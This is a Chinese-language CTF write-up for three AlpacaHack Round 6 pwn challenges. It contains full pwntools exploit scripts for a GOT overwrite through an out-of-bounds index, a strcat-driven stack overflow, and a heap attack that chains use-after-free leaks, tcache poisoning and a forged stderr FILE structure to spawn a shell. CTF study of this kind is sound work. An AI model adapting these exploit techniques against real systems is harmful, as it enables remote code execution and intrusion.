AlpacaHack Round 6 (Pwn) - writeup

Author: 堇姬Naup

最近看到來賽後挑戰一下，除了第三題外都有打出來
簡單記錄一下

inbound

oob 寫 GOT 成 win function

from pwn import *


r=process("./inbound")

r=remote("34.170.146.252", 39404)

win = 0x4011d6

debug = input("(Y/N)")
if debug == "Y" or debug == "y":
    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r)


r.sendlineafter(b"index: ",str(-14).encode())

r.sendlineafter(b"value: ",str(win+0x5).encode())

print("WIN:",hex(win))

r.interactive()

catcpy

strcpy 沒有 overflow，但用 strcat 串上去後會 overflow，但是 strcat 不能用 Null byte，另外若不是用上限長度的話，會產生 \x0a，先去修掉原來 return address 上一個 libc address 的高位，之後 strcat 輸入到極限長度，蓋上 win function

from pwn import *

r=process("./catcpy")

r=remote("34.170.146.252", 32426)

debug = input("(Y/N)")
if debug == "Y" or debug == "y":
    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r)


def STRCPY(data):
    r.sendlineafter(b"> ",b'1')
    r.sendlineafter(b"Data: ",data)


def STRCAT(data):
    r.sendlineafter(b"> ",b'2')
    r.sendlineafter(b"Data: ",data)

STRCPY(b'A'*(0x100-0x1))
STRCAT(b'c'*(0x18+0x5))

STRCPY(b'A'*(0x100-0x1))
STRCAT(b'c'*(0x18+0x4))

win = 0x401256

STRCPY(b'a'*(0x1b))
print("[!] success strcpy")
STRCAT(b'b'*(0x100-0x4)+p32(win+0x5)[:3])

r.sendlineafter(b'> ',b'3')

r.interactive()

ideabook

有 oob，可以導致 index 輸入 16 的 chunk size，吃到 index 0 的 pointer，所以可以輸入長度變成超級長，所以導致 heap overflow + UAF
另外通過去修改某塊 chunk 的 size，及補上 prev size，讓我們可以去 free 出一塊 libc 再通過 UAF 就可以 leak libc 了
另外也可以 leak heap 來 bypass pointer protect
最後打 tcache poinsoning 來去任意寫 stderr，打 IO_FILE 來 get shell

這題是用我的 template exploit 的
可以去我 github 上的 MyCTFlib 找到

from pwn import *
from libs.NAUP_pwn_lib import *
import time
from libs.NAUP_filestructure_lib import *
from libs.NAUP_fmt_lib import *

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

x64_env()

REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r=process('./chal')
    debug_init()
    
else:                                           
    REMOTE_INFO=split_nc("nc 34.170.146.252 36507")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT)

### attach
if input('attach?(y/n)') == 'y':
    p(r)


def create(idx, size):
    sla(b"> ",b'1')
    sla(b"Index: ",str(idx).encode())
    sla(b"Size: ",str(size).encode())

def edit(idx, ctx):
    sla(b"> ",b"2") 
    sla(b"Index: ",str(idx).encode())
    sla(b"Content: ",ctx)

def read(idx):
    sla(b"> ",b"3")
    sla(b"Index: ",str(idx).encode())

def delete(idx):
    sla(b"> ",b"4")
    sla(b'Index: ',str(idx).encode())

### exploit

create(16, 0)
create(0, 32)
create(1, 0x30)
create(2, 0x30)
delete(1)
delete(2)
create(3, 0x100)
create(4,0x100)
create(5,0x100)
create(6, 0x100)

edit(6, p64(0x31)*0x10)

read(16)

leakdata = rc(0x60)

leakheap = u64(leakdata[0x58:0x58+0x8].ljust(8,b'\x00')) << 4
heapbase = leakheap

edit(16,b'a'*0x18+p64(0x421))
delete(0)

create(0,32)
read(16)
leakdata = rc(0x100)

leaklibc = u64(leakdata[0x58:0x58+0x8]) >> 8
libcbase = leaklibc - 0x21ace0

create(7,0xe0)
create(8,0xe0)

delete(8)
delete(7)

fake_chunk = libcbase + 0x21b6a0

fake_addr = fake_chunk^((heapbase + 0x2f0) >> 12)

edit(16,b'b'*0x10 + p64(0) + p64(0x31) + b'b'*0x20+ p64(0) + p64(0xe1) + p64(fake_addr) + p64(0))

create(9, 0xe0)
create(10, 0xe0)

libc_system = libcbase + 0x50d70
libc_IO21stderr = libcbase + 0x21b6a0

payload =  p32(0xfbad0101) + b";sh\x00" 
payload += b'\x00' * (0x58 - len(payload))
payload += p64(libc_system)
payload += b'\x00' * (0x88 - len(payload))
payload += p64(libc_IO21stderr - 0x10)
payload += b'\x00' * (0xa0 - len(payload))
payload += p64(libc_IO21stderr - 0x10)
payload += b'\x00' * (0xc0 - len(payload))
payload += p32(1)
payload += b'\x00' * (0xd0 - len(payload))
payload += p64(libc_IO21stderr - 0x10)
payload += p64(libcbase + 0x217080) # _IO_wfile_jumps - 0x40

edit(10, payload[:-1]) # get fake chunk

sla(b'> ',b'5')

NAUPINFO("LEAKLIBC",hex(leaklibc))
NAUPINFO("LIBCBASE",hex(libcbase))
NAUPINFO("LEAKHEAP",hex(leakheap))
NAUPINFO("Fakechunk",hex(fake_chunk))
### interactive
ita()

after all

其實 alpacahack 的 pwn 感覺不難，完成這三題大概花了 6~7 小時左右，主要是排 heap 踩了些坑
第三題只有看出一個 Null byte overflow，在 stack 上，大致想法是將 rbp 修小，讓 return address 變到一個可控的位置，就可以打 ROP 了，不過一直沒有 exploit 出來
如果有人想討論題目歡迎私訊